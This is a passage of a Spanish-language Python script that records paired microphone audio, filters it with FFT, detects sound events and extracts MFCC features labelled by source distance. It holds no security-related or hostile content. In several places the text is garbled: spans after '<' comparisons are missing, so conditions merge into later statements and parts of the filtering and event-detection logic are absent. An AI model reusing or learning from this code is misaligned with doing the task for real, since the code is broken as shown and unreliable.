df.to_csv('nombres_diferencias.csv')\n if (path.exists('nombres_individuales.csv')) == False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=['nombres','distancias'])\n df.to_csv('nombres_individuales.csv')\n if (path.exists('nombres_valores.csv')) == False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=[''])\n df.to_csv('nombres_valores.csv')\n if (path.exists('mfcc.csv')) == False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=[''])\n df.to_csv('mfcc.csv')\n aux = False\n options = [1,2,3,4,5,6,7,8,88,89,9,10,11]\n de=6\n iz=7\n distancias=[0.5 ,1 ,1.5 ,2 ,2.5 ,3 ,3.5 ,4 ,4.5,5]\n a=b=c=d=e=f=g=h=i=j=\"0\"\n while (aux==False):\n distancia = 0.\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n fs = 22050\n sd.default.samplerate = fs\n # print(fs)\n sd.default.channels = 1\n duration = 2\n print(\"1-Grabar\")\n print(\"2-Ver señales \")\n print(\"3-ver fft y dispositivos\")\n print(\"4-FFT\")\n print(\"5-Ver señales transformadas\")\n print(\"6-detectar sonidos\")\n print(\"\")\n print(\"88- csv\")\n print(\"\")\n print(\"\")\n print(\"10-salir\")\n\n error = True\n while error ==True:\n try:\n option = int(input())\n print(\"opcion: \", option)\n error = False\n except ValueError:\n print(\"1-Grabar\")\n print(\"2-Ver señales \")\n print(\"3-ver fft y dispositivos\")\n print(\"4-FFT\")\n print(\"5-Ver señales transformadas\")\n print(\"6-detectar sonidos\")\n print(\"\")\n print(\"88- csv\")\n print(\"\")\n print(\"\")\n print(\"10-salir\")\n\n if option in options:\n\n\n if (option==1):\n print(\"ingrese cantidad de repeteciones\")\n cantidad =1\n\n distancia=-1\n while (distancia > 500 or distancia < 0):\n print(\"ingrese la distancia en centimetros\")\n distancia=int(input())\n\n i=0\n valores=[]\n contador = 0\n df = pd.read_csv(\"nombres_diferencias.csv\", usecols=(\"nombres\", \"distancias\"), dtype=str)\n\n while i < cantidad:\n\n tiempo = int(time.time() )\n p1 = Process(target=ejecutar_doc1, args=(tiempo,))\n p1.start()\n p2 = Process(target=ejecutar_doc2, args=(tiempo,))\n p2.start()\n p1.join()\n p2.join()\n i= i+1\n time.sleep(1)\n valores.append([tiempo, distancia])\n df1 = pd.DataFrame(valores, columns=(\"nombres\", \"distancias\"))\n print(\"hey\")\n df = df.append(df1, ignore_index=True)\n print(df)\n df.to_csv(\"nombres_diferencias.csv\")\n input()\n if (option == 2):\n a= pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n for i in range(len(valores)):\n uno=str(\"1_\"+str(valores[i])+\".wav\")\n dos=str(\"2_\"+str(valores[i])+\".wav\")\n\n print(uno,dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n show(signal, signal2)\n print(\"presiona enter para continuar\")\n input()\n if option == 3:\n print(sd.query_devices())\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n #print(\"ingrese frecuencia\")\n #frec=int(input())\n for i in range(len(valores)):\n uno = str(\"1_\" + str(valores[i]) + \".wav\")\n dos = str(\"2_\" + str(valores[i]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = 
archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n W = np.fft.fftfreq(len(signal))*44100\n val=W\n fft_signal = np.fft.fft(signal)\n fft_theo=(2.0*np.abs(fft_signal/len(signal)))\n cut_f_signal = fft_signal.copy()\n #PARA VER FRECUENCIA DE SONIDO FFT\n plt.plot((W), (((cut_f_signal)/44100)))\n print(cut_f_signal/44100)\n plt.xlabel('Frecuencia Hz') # Colocamos la etiqueta para el eje x\n plt.ylabel('Cantidad de muestras') # Colocamos la etiqueta para el eje y\n\n\n axes = plt.gca()\n\n axes.set_xlim([0,500])\n\n plt.show()\n print(\"presiona enter para continuar\")\n input()\n if option == 4:\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n print(\"ingrese frecuencia\")\n frec=int(input())\n for i in range(len(valores)):\n uno = str(\"1_\" + str(valores[i]) + \".wav\")\n\n dos = str(\"2_\" + str(valores[i]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n print(len(signal))\n\n W = np.fft.fftfreq(len(signal))*44100\n val=W\n fft_signal = np.fft.fft(signal)\n fft_theo=(2.0*np.abs(fft_signal/len(signal)))\n cut_f_signal = fft_signal.copy()\n # PARA VER FRECUENCIA DE SONIDO FFT\n #plt.plot(W,cut_f_signal)\n #plt.show()\n a=frec-5\n b=frec+5\n for i in range(0,len(W)):\n if((W[i]<-b) or (W[i])>b):\n cut_f_signal[[i]]=0\n else:\n if((W[i]>-a) and (W[i] 0\n fft_signal = np.fft.fft(signal)\n cut_f_signal = fft_signal.copy()\n a=frec-10\n b=frec+10\n for i in range(0,len(W)):\n if((W[i]<-b) or (W[i])>b):\n cut_f_signal[[i]]=0\n else:\n if((W[i]>-a) and (W[i] 0.006)] = 0\n final = np.fft.ifft(cut_f_signal)\n final = final.astype('int16')\n for inicio in range(0, 1000):\n final[inicio] = 10\n for fin in range(len(signal) - 1000, len(signal)):\n final[fin] = 10\n wavfile.write('fft_{}'.format(dos), 44100, final)\n if option==5:\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n for i in range(len(valores)):\n uno = str(\"fft_1_\" + str(valores[i]) + \".wav\")\n dos = str(\"fft_2_\" + str(valores[i]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n show(signal,signal2)\n ''' ESPECTROGRAMA\n\n (rate1, sig1) = wav.read(uno)\n (rate2, sig2) = wav.read(dos)\n f, t, Sxx = sg.spectrogram(signal, rate1, nperseg=441)\n f2, t2, Sxx2 = sg.spectrogram(signal2, rate2, nperseg=441)\n a = plt.subplot(211)\n plt.pcolor(t, f, Sxx, vmin=0, vmax=2000, cmap='gist_earth')\n axes = plt.gca()\n axes.set_ylim([-100, 7000])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n b = plt.subplot(212)\n plt.pcolor(t2, f2, Sxx2, vmin=0, vmax=2000, cmap='gist_earth')\n axes = plt.gca()\n axes.set_ylim([-100, 7000])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n plt.show()\n '''\n print(\"presiona enter para continuar\")\n input()\n if (option==6):\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n distancia = a['distancias']\n dif1 = \"\"\n cont = 0\n 
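# The loop below slides windows of 4410*dur samples (dur counts tenths of a second at 44.1 kHz) over both channels, summing absolute amplitude per window and flagging windows whose sum rises past maximo. Equivalent per-window energy, vectorised (illustrative sketch only, not part of the original flow):\n # win = int(4410 * dur)\n # trimmed = np.abs(signal[:len(signal) // win * win])\n # energy = trimmed.reshape(-1, win).sum(axis=1)\n 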
print(\"ingrese duracion del sonido ej: 0.1\")\n dur = float(input())\n dur2 = dur\n dur = int(dur/0.1)\n #a = int(input())\n\n cont_name = 0\n\n b = pd.read_csv('nombres_individuales.csv')\n name_csv = []\n dif_csv = []\n df1 = pd.DataFrame([], columns=['nombres', 'distancias'])\n for i in range(len(valores)):\n #print(\"sonido? a)alto b)bajo\")\n\n #mx = str(input())\n mx = \"a\"\n if mx == \"a\":\n maximo = 2004730\n else:\n maximo = 68000\n uno = str(\"fft_1_\" + str(valores[i]) + \".wav\")\n dos = str(\"fft_2_\" + str(valores[i]) + \".wav\")\n print(\"nombres de los archivos: \", uno, dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n muestra = []\n aux = 0\n suma_ant = 0\n suma_ant2 = 0\n contador=0\n\n for j in range(0,len(signal)-int(4410*dur),int(4410*dur)):\n suma = 0\n suma2 = 0\n\n for x in range(0,4410*dur):\n suma=np.abs(suma)+np.abs(signal[j+x])\n suma2=np.abs(suma2)+np.abs(signal2[j+x])\n print(\"-\")\n\n print(suma/100000)\n print(suma_ant/100000)\n\n print(suma2/100000)\n print(suma_ant2/100000)\n\n print(maximo/100000)\n print(\"-\")\n if((suma > maximo) and (suma_ant > suma)):\n print(\"ooeeeeee\")\n if ((suma2 > maximo) and (suma_ant2 >suma2 )):\n print(\"Aaaa\")\n if ( (((suma > maximo) and (suma_ant < suma)) or ((suma2 > maximo) and (suma_ant2 0) )):\n for m in range((muestra[valor])-dur*4410, (muestra[valor]+dur*4410), dur*441):\n print(\"oe\")\n center= 0\n center2=0\n for n in range (0,dur*441):\n center=np.abs(center)+np.abs(signal[m+n])\n center2=np.abs(center2)+np.abs(signal2[m+n])\n\n\n print(center)\n tiempo = ((muestra[valor]) -9700)\n tiempo2 = ((muestra[valor]) + 5000)\n if (tiempo>0 and tiempo2>0):\n tiempo_med=np.max(signal[tiempo:tiempo2])\n tiempo_med2=np.max(signal2[tiempo:tiempo2])\n if(tiempo_med >= tiempo_med2 ):\n signal3 = signal[tiempo:tiempo2].tolist()\n c = signal3.index(tiempo_med)\n tiempo2 = tiempo + c +(4500)\n tiempo = tiempo +c -(3000)\n\n if tiempo_med2>tiempo_med:\n signal3=signal2[tiempo:tiempo2].tolist()\n c=signal3.index(tiempo_med2)\n tiempo2 = tiempo + c +(4500)\n tiempo=tiempo+ c -(3000)\n\n tiempo = tiempo/44.1\n tiempo2 = tiempo2/44.1\n t1 = tiempo - 100 * dur2 *10\n t2 = tiempo2 + 60 * dur2*10\n t3 = tiempo - 100 *dur2*10\n t4 = tiempo2 + 60 *dur2*10\n newAudio = AudioSegment.from_wav(uno)\n newAudio = newAudio[t1:t2]\n name = str(cont_name)\n dif1 = str(distancia[i])\n newAudio.export('{}.a.wav'.format(name), format=\"wav\")\n newAudio = AudioSegment.from_wav(dos)\n newAudio = newAudio[t3:t4]\n newAudio.export('{}.b.wav'.format(name), format=\"wav\")\n name1 = (str(cont_name) + \".a\")\n name_csv.append([name1, dif1])\n name2 = (str(cont_name) + \".b\")\n name_csv.append([name2, dif1])\n cont_name = cont_name + 1\n\n\n\n\n if(((((muestra[valor]) / 44.1) - 441 / 2) >0 and valor!=0 and valor!=len(muestra) and (((muestra[valor]-muestra[valor-1*dur]>(4410*2 ))and (muestra[valor+1]-muestra[valor]>(4410*3)))or muestra[valor-1]==0))):\n for m in range((muestra[valor])-dur*4410, (muestra[valor]+dur*4410), dur*441):\n\n print(\"oe\")\n center= 0\n center2=0\n for n in range (0,dur*441):\n center=np.abs(center)+np.abs(signal[m+n])\n center2=np.abs(center2)+np.abs(signal2[m+n])\n\n print(center)\n tiempo = ((muestra[valor]) 
-9700)\n tiempo2 = ((muestra[valor]) + 5000)\n if (tiempo>0 and tiempo2>0):\n tiempo_med=np.max(signal[tiempo:tiempo2])\n tiempo_med2=np.max(signal2[tiempo:tiempo2])\n\n\n\n\n\n if(tiempo_med >= tiempo_med2 ):\n signal3 = signal[tiempo:tiempo2].tolist()\n c = signal3.index(tiempo_med)\n tiempo2 = tiempo + c +(4500)\n tiempo = tiempo +c -(3000)\n\n if tiempo_med2>tiempo_med:\n signal3=signal2[tiempo:tiempo2].tolist()\n c=signal3.index(tiempo_med2)\n tiempo2 = tiempo + c +(4500)\n tiempo=tiempo+ c -(3000)\n\n tiempo = tiempo/44.1\n tiempo2 = tiempo2/44.1\n t1 = tiempo - 100 * dur2 *10\n t2 = tiempo2 + 60 * dur2*10\n t3 = tiempo - 100 *dur2*10\n t4 = tiempo2 + 60 *dur2*10\n newAudio = AudioSegment.from_wav(uno)\n newAudio = newAudio[t1:t2]\n name = str(cont_name)\n dif1 = str(distancia[i])\n newAudio.export('{}.a.wav'.format(name), format=\"wav\")\n newAudio = AudioSegment.from_wav(dos)\n newAudio = newAudio[t3:t4]\n newAudio.export('{}.b.wav'.format(name), format=\"wav\")\n name1 = (str(cont_name) + \".a\")\n name_csv.append([name1, dif1])\n name2 = (str(cont_name) + \".b\")\n name_csv.append([name2, dif1])\n cont_name = cont_name + 1\n df1 =pd.DataFrame(name_csv, columns=(\"nombres\",\"distancias\"))\n df1.to_csv(\"nombres_individuales.csv\")\n\n if option==7:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n for i in range(0,len(valores),2):\n uno = str(str(valores[i])+\".wav\")\n #print(uno)\n dos = str(str(valores[i+1])+\".wav\")\n #print(dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n plt.subplot(211)\n plt.title(str(valores[i]))\n plt.plot(signal)\n plt.plot(signal2)\n axes = plt.gca()\n plt.subplot(212)\n plt.title(str(valores[i+1]))\n plt.plot(signal2)\n plt.plot(signal)\n axes = plt.gca()\n plt.show()\n\n if option==8:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n for i in range(0,len(valores),2):\n uno = str(str(valores[i])+\".wav\")\n #print(uno)\n dos = str(str(valores[i+1])+\".wav\")\n #print(dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n f, t, Sxx = sg.spectrogram(signal, fs, nperseg=441)\n\n plt.pcolormesh(t, f, Sxx)\n axes = plt.gca()\n axes.set_ylim([200, 2050])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n plt.show()\n f2, t2, Sxx2 = sg.spectrogram(signal2, fs, nperseg=441)\n\n plt.pcolormesh(t2, f2, Sxx2)\n axes = plt.gca()\n axes.set_ylim([200, 2050])\n plt.ylabel('Frecuencia [Hz]')\n plt.xlabel('Tiempo [sec]')\n plt.show()\n\n if option == 9:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n for i in range(0, len(valores), 2):\n uno = str(str(valores[i]) + \".wav\")\n print(uno)\n dos = str(str(valores[i + 1]) + \".wav\")\n print(dos)\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n 
data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n\n plt.subplot(211)\n plt.title(\"señales\")\n\n plt.plot(signal)\n plt.plot(signal2)\n\n # axes = plt.gca()\n # axes.set_ylim([-700, 700])\n\n\n # axes = plt.gca()\n # axes.set_ylim([-700, 700])\n plt.subplot(212)\n plt.title('Convolve')\n\n x= fftconvolve(signal,signal2,\"same\")\n plt.plot(x)\n plt.show()\n if option==88:\n print(\"cual?\")\n ingresado=input()\n a = pd.read_csv('nombres_individuales.csv')\n print(a)\n valores = a['nombres']\n valores_csv = []\n distancia =a['distancias']\n #print(distancia)\n #print(len(valores))\n #for i in range(0, int(len(valores)),2):\n for i in range(0, int(len(valores)),2):\n\n dis=int(distancia[i]/10)*10\n string= int(distancia[i])\n array = np.zeros(50,dtype=int)\n array[int(string/10)]=1\n\n\n uno = str(str(valores[i])+\".wav\")\n dos = str(str(valores[i+1]) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n #print(signal)\n #print(signal2)\n\n #plt.plot(signal)\n #plt.plot(signal2)\n #plt.show()\n #convolve = fftconvolve(signal, signal2, \"same\") / 10\n #convolve = np.round(convolve)\n #print(len(convolve))\n #if len(convolve)<9041:\n # np.append(convolve,[0])\n\n #opcion 1\n \"\"\"\n if np.max(signal) < np.max(signal2):\n signal_mayor = signal\n else:\n signal_mayor = signal2\n \"\"\"\n #opcion 2\n signal_mayor = fftconvolve(signal, signal2, \"same\")\n signal_mayor = np.round(signal_mayor)\n\n diferencia=np.max(signal)-np.max(signal2)\n\n prim = []\n prim2 = []\n prim3 = []\n prim4 = []\n prim5 = []\n prim6 = []\n prim7 = []\n prim8 = []\n prim9 = []\n prim10 = []\n prim11 = []\n prim12 = []\n prim13 = []\n prim14 = []\n prim15 = []\n prim16 = []\n prim17 = []\n prim18 = []\n prim19 = []\n prim20 = []\n prim21 = []\n prim22 = []\n prim23 = []\n prim24 = []\n prim25 = []\n prim26 = []\n prim27 = []\n prim28 = []\n prim29 = []\n prim30= []\n print(\"size original\", len(signal))\n for x in range(0, len(signal)-29, 30):\n prim.append(int(signal_mayor[x]))\n prim2.append(int(signal_mayor[x+1]))\n prim3.append(int(signal_mayor[x+2]))\n prim4.append(int(signal_mayor[x+3]))\n prim5.append(int(signal_mayor[x+4]))\n prim6.append(int(signal_mayor[x+5]))\n prim7.append(int(signal_mayor[x+6]))\n prim8.append(int(signal_mayor[x+7]))\n prim9.append(int(signal_mayor[x+8]))\n prim10.append(int(signal_mayor[x+9]))\n prim11.append(int(signal_mayor[x+10]))\n prim12.append(int(signal_mayor[x+11]))\n prim13.append(int(signal_mayor[x+12]))\n prim14.append(int(signal_mayor[x+13]))\n prim15.append(int(signal_mayor[x+14]))\n prim16.append(int(signal_mayor[x+15]))\n prim17.append(int(signal_mayor[x+16]))\n prim18.append(int(signal_mayor[x+17]))\n prim19.append(int(signal_mayor[x+18]))\n prim20.append(int(signal_mayor[x+19]))\n prim22.append(int(signal_mayor[x + 21]))\n prim21.append(int(signal_mayor[x+20]))\n prim23.append(int(signal_mayor[x + 22]))\n prim24.append(int(signal_mayor[x + 23]))\n prim25.append(int(signal_mayor[x + 24]))\n prim26.append(int(signal_mayor[x + 25]))\n prim27.append(int(signal_mayor[x + 26]))\n prim28.append(int(signal_mayor[x + 27]))\n prim29.append(int(signal_mayor[x + 28]))\n prim30.append(int(signal_mayor[x + 29]))\n plt.plot(prim)\n plt.show()\n 
prim=((mfcc(np.asarray(prim[0:len(prim)]), int(1000*np.log10(len(signal))), nfft=1103)*10).astype(int)).transpose().tolist()\n plt.plot(prim[0])\n plt.show()\n prim2=((mfcc(np.asarray(prim2[0:len(prim2)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim3=((mfcc(np.asarray(prim3[0:len(prim3)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim4=((mfcc(np.asarray(prim4[0:len(prim4)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim5=((mfcc(np.asarray(prim5[0:len(prim5)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim6=((mfcc(np.asarray(prim6[0:len(prim6)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim7=((mfcc(np.asarray(prim7[0:len(prim7)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim8=((mfcc(np.asarray(prim8[0:len(prim8)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim9=((mfcc(np.asarray(prim9[0:len(prim9)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim10=((mfcc(np.asarray(prim10[0:len(prim10)]), 44100/30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim12=((mfcc(np.asarray(prim12[0:len(prim12)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim13=((mfcc(np.asarray(prim13[0:len(prim13)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim11=((mfcc(np.asarray(prim11[0:len(prim11)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim14=((mfcc(np.asarray(prim14[0:len(prim14)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim15=((mfcc(np.asarray(prim15[0:len(prim15)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim16=((mfcc(np.asarray(prim16[0:len(prim16)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim17=((mfcc(np.asarray(prim17[0:len(prim17)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim18=((mfcc(np.asarray(prim18[0:len(prim18)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim19=((mfcc(np.asarray(prim19[0:len(prim19)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim20=((mfcc(np.asarray(prim20[0:len(prim20)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim21=((mfcc(np.asarray(prim21[0:len(prim21)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim22=((mfcc(np.asarray(prim22[0:len(prim22)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim23=((mfcc(np.asarray(prim23[0:len(prim23)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim24=((mfcc(np.asarray(prim24[0:len(prim24)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim25=((mfcc(np.asarray(prim25[0:len(prim25)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim26=((mfcc(np.asarray(prim26[0:len(prim26)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim27=((mfcc(np.asarray(prim27[0:len(prim27)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim28=((mfcc(np.asarray(prim28[0:len(prim28)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim29=((mfcc(np.asarray(prim29[0:len(prim29)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n prim30=((mfcc(np.asarray(prim30[0:len(prim30)]), 44100 / 30, nfft=1103)*10).astype(int)).transpose().tolist()\n\n prim = prim[0]\n prim2 = prim2[0]\n prim3 = prim3[0]\n prim4 = prim4[0]\n prim5 = prim5[0]\n prim6 = prim6[0]\n prim7 = prim7[0]\n prim8 = prim8[0]\n prim9 = prim9[0]\n prim10 = 
prim10[0]\n prim11 = prim11[0]\n prim12 = prim12[0]\n prim13 = prim13[0]\n prim14 = prim14[0]\n prim15 = prim15[0]\n prim16 = prim16[0]\n prim17 = prim17[0]\n prim18 = prim18[0]\n prim19 = prim19[0]\n prim20 = prim20[0]\n prim21 = prim21[0]\n prim22 = prim22[0]\n prim23 = prim23[0]\n prim24 = prim24[0]\n prim25 = prim25[0]\n prim26 = prim26[0]\n prim27 = prim27[0]\n prim28 = prim28[0]\n prim29 = prim29[0]\n prim30 = prim30[0]\n\n prim.append(diferencia)\n prim2.append(diferencia)\n prim3.append(diferencia)\n prim4.append(diferencia)\n prim5.append(diferencia)\n prim6.append(diferencia)\n prim7.append(diferencia)\n prim8.append(diferencia)\n prim9.append(diferencia)\n prim10.append(diferencia)\n prim11.append(diferencia)\n prim12.append(diferencia)\n prim13.append(diferencia)\n prim14.append(diferencia)\n prim15.append(diferencia)\n prim16.append(diferencia)\n prim17.append(diferencia)\n prim18.append(diferencia)\n prim19.append(diferencia)\n prim20.append(diferencia)\n prim21.append(diferencia)\n prim22.append(diferencia)\n prim23.append(diferencia)\n prim24.append(diferencia)\n prim25.append(diferencia)\n prim26.append(diferencia)\n prim27.append(diferencia)\n prim28.append(diferencia)\n prim29.append(diferencia)\n prim30.append(diferencia)\n\n\n if ingresado == \"b\":\n prim.append(dis)\n prim2.append(dis)\n prim3.append(dis)\n prim4.append(dis)\n prim5.append(dis)\n prim6.append(dis)\n prim7.append(dis)\n prim8.append(dis)\n prim9.append(dis)\n prim10.append(dis)\n prim11.append(dis)\n prim12.append(dis)\n prim13.append(dis)\n prim14.append(dis)\n prim15.append(dis)\n prim16.append(dis)\n prim17.append(dis)\n prim18.append(dis)\n prim19.append(dis)\n prim20.append(dis)\n prim21.append(dis)\n prim22.append(dis)\n prim23.append(dis)\n prim24.append(dis)\n prim25.append(dis)\n prim26.append(dis)\n prim27.append(dis)\n prim28.append(dis)\n prim29.append(dis)\n prim30.append(dis)\n\n if ingresado == \"a\":\n for z in range(0,20):\n prim.append(array[z])\n prim2.append(array[z])\n prim3.append(array[z])\n prim4.append(array[z])\n prim5.append(array[z])\n prim6.append(array[z])\n prim7.append(array[z])\n prim8.append(array[z])\n prim9.append(array[z])\n prim10.append(array[z])\n prim11.append(array[z])\n prim12.append(array[z])\n prim13.append(array[z])\n prim14.append(array[z])\n prim15.append(array[z])\n prim16.append(array[z])\n prim17.append(array[z])\n prim18.append(array[z])\n prim19.append(array[z])\n prim20.append(array[z])\n prim21.append(array[z])\n prim22.append(array[z])\n prim23.append(array[z])\n prim24.append(array[z])\n prim25.append(array[z])\n prim26.append(array[z])\n prim27.append(array[z])\n prim28.append(array[z])\n prim29.append(array[z])\n prim30.append(array[z])\n valores_csv.append(prim)\n valores_csv.append(prim2)\n valores_csv.append(prim3)\n valores_csv.append(prim4)\n valores_csv.append(prim5)\n valores_csv.append(prim6)\n valores_csv.append(prim7)\n valores_csv.append(prim8)\n valores_csv.append(prim9)\n valores_csv.append(prim10)\n valores_csv.append(prim12)\n valores_csv.append(prim13)\n valores_csv.append(prim14)\n valores_csv.append(prim15)\n valores_csv.append(prim16)\n valores_csv.append(prim17)\n valores_csv.append(prim18)\n valores_csv.append(prim19)\n valores_csv.append(prim20)\n valores_csv.append(prim21)\n valores_csv.append(prim22)\n valores_csv.append(prim23)\n valores_csv.append(prim24)\n valores_csv.append(prim25)\n valores_csv.append(prim26)\n valores_csv.append(prim27)\n valores_csv.append(prim28)\n valores_csv.append(prim29)\n 
valores_csv.append(prim30)\n\n\n\n df1 = pd.DataFrame( valores_csv[:])\n print(df1)\n df1.to_csv(\"nombres_valores.csv\")\n\n\n if option == 89:\n a = pd.read_csv('nombres_individuales.csv')\n valores = a['nombres']\n valores_csv = []\n distancia = a['distancias']\n cont=0\n #print(len(valores))\n\n for i in range(0, int(len(valores)),2):\n\n dis = int(distancia[i])\n string = int(distancia[i])\n array = np.zeros(50, dtype=int).tolist()\n array[int(string / 10)] = 1\n #print(type(array))\n uno = str(str(valores[i]) + \".wav\")\n dos = str(str(valores[i + 1]) + \".wav\")\n y, sr = librosa.load(uno)\n y2, sr2 = librosa.load(dos)\n\n F,f_names=audioFeatureExtraction.stFeatureExtraction(y, sr, 0.050*sr, 0.025*sr)\n F2,f_names2=audioFeatureExtraction.stFeatureExtraction(y2, sr2, 0.050*sr2, 0.025*sr2)\n a=F[0,:].tolist()\n a1=F[1,:].tolist()\n a=a+a1\n b=F2[0,:].tolist()\n b1=F2[1,:].tolist()\n b=b+b1\n #print(a)\n #print(len(a))\n #print(f_names[0])\n #plt.plot(librosa.feature.melspectrogram(y))\n #plt.show()\n\n #print(len(sig1)/rate1)\n #(rate2, sig2) = wav.read(dos)\n\n #mfcc_feat1 = mfcc(sig1, 44100,nfft=2046)\n #print(\"mfcc\",( len(mfcc_feat1[1,:]) ))\n #mfcc_feat2 = mfcc(sig2, 44100,nfft=2046)\n #fbank_feat1 = logfbank(sig1, rate1,nfft=2046)\n #print(\"fbank\", len(fbank_feat1[1,:]))\n #fbank_feat2 = logfbank(sig2, rate2,nfft=2046)\n #features1 = np.concatenate((mfcc_feat1, fbank_feat1), axis=1)\n #features2 = np.concatenate((mfcc_feat2, fbank_feat2), axis=1)\n #plt.imshow(fbank_feat1)\n #plt.show()\n #print(\"f1\",features1)\n #print(\"f2\",features2)\n #print(\"fbank\",fbank_feat2)\n #a=(fbank_feat1[1,:]).tolist()\n #b=(fbank_feat2[1,:]).tolist()\n #a=(mfcc_feat1[1,:]).tolist()\n #a1=(mfcc_feat[2,:]).tolist()\n #a2=(mfcc_feat[3,:]).tolist()\n #a=(features1[1,:]).tolist()\n #b=(features2[1,:]).tolist()\n c=a+b+array\n #b=(mfcc_feat2[1,:]).tolist()\n #b1=(mfcc_feat2[2,:]).tolist()\n #b2=(mfcc_feat2[3,:]).tolist()\n #a=a+a1+a2\n #b=b+b1+b2\n #c=a+b\n #d=c+array\n 